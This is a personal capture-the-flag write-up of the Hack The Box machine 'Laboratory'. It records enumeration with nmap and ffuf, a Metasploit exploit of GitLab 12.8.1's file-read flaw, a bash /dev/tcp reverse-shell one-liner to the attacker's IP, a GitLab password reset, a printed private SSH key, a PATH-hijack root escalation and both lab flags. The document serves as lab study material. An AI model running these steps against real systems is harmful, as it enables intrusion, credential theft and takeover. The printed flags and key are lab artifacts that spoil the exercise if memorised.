HTB Laboratory done
Laboratory
Notes
git.laboratory.htb
OS:
Linux
Technology:
GitLab Community Edition 12.8.1
IP Address:
10.129.168.236
Open ports:
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41
443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
Users and pass:
Register a new user - gitlab
U: janjanjan
M: [email protected]
P: qwerty123
---
Changed password for user dexter:
U: dexter
P: qwerty123
Nmap: 10.129.168.236
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Laboratory]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.129.168.236_nmap 10.129.168.236 ; cat 10.129.168.236_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-16 12:15 CEST
Nmap scan report for 10.129.168.236
Host is up (0.18s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 25:ba:64:8f:79:9d:5d:95:97:2c:1b:b2:5e:9b:55:0d (RSA)
| 256 28:00:89:05:55:f9:a2:ea:3c:7d:70:ea:4d:ea:60:0f (ECDSA)
|_ 256 77:20:ff:e9:46:c0:68:92:1a:0b:21:29:d1:53:aa:87 (ED25519)
80/tcp open http Apache httpd 2.4.41
|_http-title: Did not follow redirect to https://laboratory.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
|_ssl-date: TLS randomness does not represent time
|_http-title: The Laboratory
|_http-server-header: Apache/2.4.41 (Ubuntu)
| ssl-cert: Subject: commonName=laboratory.htb
| Subject Alternative Name: DNS:git.laboratory.htb
| Not valid before: 2020-07-05T10:39:28
|_Not valid after: 2024-03-03T10:39:28
| tls-alpn:
|_ http/1.1
Add IP to /etc/hosts
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Laboratory]
└─$ cat /etc/hosts | grep lab
10.129.168.236 laboratory.htb git.laboratory.htb
Ffuz - http://laboratory.htb/FUZZ
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Laboratory]
└─$ ffuf -u http://laboratory.htb/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o laboratory.htb_ffuz -of all -e .php,.html,.txt,.bac,.backup,.md,.git
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://laboratory.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup .md .git
:: Output file : laboratory.htb_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
:: Progress: [163752/163752] :: Job [1/1] :: 546 req/sec :: Duration: [0:06:04] :: Errors: 0 ::
Ffuz - https://laboratory.htb/FUZZ
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Laboratory]
└─$ ffuf -u https://laboratory.htb/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o laboratory.htb_443_ffuz -of all -e .php,.html,.txt,.bac,.backup,.md,.git
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : https://laboratory.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup .md .git
:: Output file : laboratory.htb_443_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
assets [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 46ms]
[INFO] Adding a new job to the queue: https://laboratory.htb/assets/FUZZ
images [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 31ms]
[INFO] Adding a new job to the queue: https://laboratory.htb/images/FUZZ
index.html [Status: 200, Size: 7254, Words: 426, Lines: 210, Duration: 63ms]
[INFO] Starting queued job on target: https://laboratory.htb/assets/FUZZ
css [Status: 301, Size: 323, Words: 20, Lines: 10, Duration: 59ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: https://laboratory.htb/assets/css/
fonts [Status: 301, Size: 325, Words: 20, Lines: 10, Duration: 92ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: https://laboratory.htb/assets/fonts/
js [Status: 301, Size: 322, Words: 20, Lines: 10, Duration: 36ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: https://laboratory.htb/assets/js/
[INFO] Starting queued job on target: https://laboratory.htb/images/FUZZ
:: Progress: [163752/163752] :: Job [3/3] :: 20 req/sec :: Duration: [0:13:00] :: Errors: 0 ::
Ffuz - https://git.laboratory.htb/FUZZ
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Laboratory]
└─$ ffuf -u https://git.laboratory.htb/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o git.laboratory.htb_ffuz -of all -e .php,.html,.txt,.bac,.backup,.md,.git
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : https://git.laboratory.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup .md .git
:: Output file : git.laboratory.htb_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
fQmTERmZ [Status: 302, Size: 105, Words: 5, Lines: 1, Duration: 88ms]
!_archives.html [Status: 302, Size: 105, Words: 5, Lines: 1, Duration: 724ms]
!_images.html [Status: 302, Size: 105, Words: 5, Lines: 1, Duration: 731ms]
!_images.txt [Status: 302, Size: 105, Words: 5, Lines: 1, Duration: 100ms]
!backup.html [Status: 302, Size: 105, Words: 5, Lines: 1, Duration: 641ms]
!backup.git [Status: 302, Size: 105, Words: 5, Lines: 1, Duration: 642ms]
!.md [Status: 302, Size: 105, Words: 5, Lines: 1, Duration: 697ms]
!_images [Status: 302, Size: 105, Words: 5, Lines: 1, Duration: 671ms]
Ffuz - FUZZ.laboratory.htb
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Laboratory]
└─$ ffuf -u https://laboratory.htb -H "Host: FUZZ.laboratory.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -mc all -ac -of all
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : https://laboratory.htb
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
:: Header : Host: FUZZ.laboratory.htb
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
________________________________________________
git [Status: 429, Size: 12, Words: 2, Lines: 2, Duration: 420ms]
#www [Status: 400, Size: 307, Words: 26, Lines: 11, Duration: 407ms]
#mail [Status: 400, Size: 307, Words: 26, Lines: 11, Duration: 552ms]
akita [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 527ms]
csd [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 3129ms]
:: Progress: [19966/19966] :: Job [1/1] :: 353 req/sec :: Duration: [0:06:00] :: Errors: 0 ::
Add subdomain to /etc/hosts
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Laboratory]
└─$ cat /etc/hosts | grep lab
10.129.185.193 laboratory.htb git.laboratory.htb akita.laboratory.htb csd.laboratory.htb
Register a new user
U: janjanjan
M: [email protected]
P: qwerty123
Find gitlab version
https://git.laboratory.htb/help
GitLab Community Edition 12.8.1
Exploit: CVE-2020-10977 GitLab 12.9.0 Arbitrary File Read
Metasploit: exploit/multi/http/gitlab_file_read_rce
Setup exploit
msf6 exploit(multi/http/gitlab_file_read_rce) > show options
Module options (exploit/multi/http/gitlab_file_read_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
DEPTH 15 yes Define the max traversal depth
PASSWORD qwerty123 no The password for the specified username
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h, http
RHOSTS 10.129.15.143 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 443 yes The target port (TCP)
SECRETS_PATH /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml yes The path to the secrets.yml file
SECRET_KEY_BASE no The known secret_key_base from the secrets.yml - this skips the arbitrary file read if present
SSL true no Negotiate SSL/TLS for outgoing connections
TARGETURI /users/sign_in yes The path to the vulnerable application
USERNAME janjanjan no The username to authenticate as
VHOST git.laboratory.htb no HTTP server virtual host
Payload options (ruby/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.14.63 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
Create revshell
msf6 exploit(multi/http/gitlab_file_read_rce) > exploit
[*] Started reverse TCP handler on 10.10.14.63:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. GitLab 12.8.1 is a vulnerable version.
[*] Logged in to user janjanjan
[*] Created project /janjanjan/5pb1uFSu
[*] Created project /janjanjan/SCGrMTNy
[*] Created issue /janjanjan/5pb1uFSu/issues/1
[*] Executing arbitrary file load
[+] File saved as: '/home/kali/.msf4/loot/20250728123332_default_10.129.15.143_gitlab.secrets_614486.txt'
[+] Extracted secret_key_base 3231f54b33e0c1ce998113c083528460153b19542a70173b4458a21e845ffa33cc45ca7486fc8ebb6b2727cc02feea4c3adbe2cc7b65003510e4031e164137b3
[*] NOTE: Setting the SECRET_KEY_BASE option with the above value will skip this arbitrary file read
[*] Attempting to delete project /janjanjan/5pb1uFSu
[*] Deleted project /janjanjan/5pb1uFSu
[*] Attempting to delete project /janjanjan/SCGrMTNy
[*] Deleted project /janjanjan/SCGrMTNy
[*] Command shell session 3 opened (10.10.14.63:4444 -> 10.129.15.143:43918) at 2025-07-28 12:33:42 +0200
help
Meta shell commands
===================
Command Description
------- -----------
help Help menu
background Backgrounds the current shell session
sessions Quickly switch to another session
resource Run a meta commands script stored in a local file
shell Spawn an interactive shell (*NIX Only)
download Download files
upload Upload files
source Run a shell script on remote machine (*NIX Only)
irb Open an interactive Ruby shell on the current session
pry Open the Pry debugger on the current session
.<command> Prefix any built-in command on this list with a '.' to execute in the underlying shell (ex: .help)
For more info on a specific command, use <command> -h or help <command>.
shell
[*] Trying to find binary 'python' on the target machine
[-] python not found
[*] Trying to find binary 'python3' on the target machine
[*] Found python3 at /opt/gitlab/embedded/bin/python3
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary 'bash' on the target machine
[*] Found bash at /bin/bash
echo os.system('/bin/bash')
git@git:~/gitlab-rails/working$ echo os.system('/bin/bash')
bash: syntax error near unexpected token `('
python -c 'import pty; pty.spawn("/bin/bash")'
<ing$ python -c 'import pty; pty.spawn("/bin/bash")'
bash: python: command not found
whereis bash
git@git:~/gitlab-rails/working$ whereis bash
bash: /bin/bash /etc/bash.bashrc /usr/share/man/man1/bash.1.gz
/bin/bash -i
git@git:~/gitlab-rails/working$ /bin/bash -i
sh -i >& /dev/tcp/10.10.14.63/4000 0>&1
git@git:~/gitlab-rails/working$ sh -i >& /dev/tcp/10.10.14.63/4000 0>&1
---
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Laboratory/gitlab-file-read-exploit]
└─$ netcat -lvnp 4000
listening on [any] 4000 ...
connect to [10.10.14.63] from (UNKNOWN) [10.129.15.143] 57854
$
Spawn TTY
script /dev/null -c bash
CTRL+Z
stty raw -echo ; fg
reset
screen
Change password for user: dexter (gitlab)
U: dexter
P: qwerty123
---
git@git:~/gitlab-rails/working$
git@git:~/gitlab-rails/working$ whereis gitlab-rails
gitlab-rails: /usr/bin/gitlab-rails /opt/gitlab/bin/gitlab-rails
git@git:~/gitlab-rails/working$ gitlab-rails console
--------------------------------------------------------------------------------
GitLab: 12.8.1 (d18b43a5f5a) FOSS
GitLab Shell: 11.0.0
PostgreSQL: 10.12
--------------------------------------------------------------------------------
Loading production environment (Rails 6.0.2)
irb(main):001:0> user = User.find(1)
user = User.find(1)
=> #<User id:1 @dexter>
irb(main):002:0> user.password = "qwerty123"
user.password = "qwerty123"
=> "qwerty123"
irb(main):003:0> user.password_confirmation = "qwerty123"
user.password_confirmation = "qwerty123"
=> "qwerty123"
irb(main):004:0> user.save!
user.save!
Enqueued ActionMailer::DeliveryJob (Job ID: 6deb2588-1f72-4417-b9d4-84d20906bb3c) to Sidekiq(mailers) with arguments: "DeviseMailer", "password_change", "deliver_now", #<GlobalID:0x00007f8781a3aa60 @uri=#<URI::GID gid://gitlab/User/1>>
=> true
irb(main):005:0>
Read id_rsa for user: dexter
https://git.laboratory.htb/dexter/securedocker/-/blob/master/dexter/.ssh/id_rsa
---
-----BEGIN OPENSSH PRIVATE KEY----- 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 -----END OPENSSH PRIVATE KEY-----
Read flag: local.txt
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Laboratory]
└─$ chmod 0700 id_rsa
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Laboratory]
└─$ ssh [email protected] -i id_rsa
dexter@laboratory:~$
dexter@laboratory:~$ id
uid=1000(dexter) gid=1000(dexter) groups=1000(dexter)
dexter@laboratory:~$ cd ~
dexter@laboratory:~$ ls -a
. .. .bash_history .bash_logout .bashrc .cache .gnupg .local .profile .ssh user.txt
dexter@laboratory:~$
dexter@laboratory:~$ cat user.txt
80277cf4e62f8437b9ea74f7113d0ab3
dexter@laboratory:~$
Privilege Escalation
Find SUID app
dexter@laboratory:~$ find / -perm -4000 2>/dev/null | grep bin | grep -v snap
/usr/local/bin/docker-security
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/su
/usr/bin/gpasswd
/usr/bin/fusermount
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/at
/usr/bin/umount
/usr/bin/chsh
/usr/bin/mount
/usr/bin/passwd
dexter@laboratory:~$
dexter@laboratory:~$ ls -la /usr/local/bin/docker-security
-rwsr-xr-x 1 root dexter 16720 Aug 28 2020 /usr/local/bin/docker-security
dexter@laboratory:~$
dexter@laboratory:~$ ltrace /usr/local/bin/docker-security
setuid(0) = -1
setgid(0) = -1
system("chmod 700 /usr/bin/docker"chmod: changing permissions of '/usr/bin/docker': Operation not permitted
<no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> ) = 256
system("chmod 660 /var/run/docker.sock"chmod: changing permissions of '/var/run/docker.sock': Operation not permitted
<no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> ) = 256
+++ exited (status 0) +++
dexter@laboratory:~$
dexter@laboratory:~$
Priv Esc
dexter@laboratory:~$ export PATH=/tmp:$PATH
dexter@laboratory:~$
dexter@laboratory:~$ echo "/bin/bash" > /tmp/chmod ; chmod a+x /tmp/chmod
dexter@laboratory:~$
dexter@laboratory:~$ /usr/local/bin/docker-security
root@laboratory:~#
root@laboratory:~# id
uid=0(root) gid=0(root) groups=0(root),1000(dexter)
Read flag: root.txt
root@laboratory:~# id
uid=0(root) gid=0(root) groups=0(root),1000(dexter)
root@laboratory:~#
root@laboratory:~# cd /root
root@laboratory:/root#
root@laboratory:/root# ls -a
. .. .bash_history .bashrc .cache .config .local .profile root.txt .selected_editor .ssh .vim .viminfo
root@laboratory:/root#
root@laboratory:/root# cat root.txt
9008d79a21832b3458158d2578052dc0
References
Lessons Learned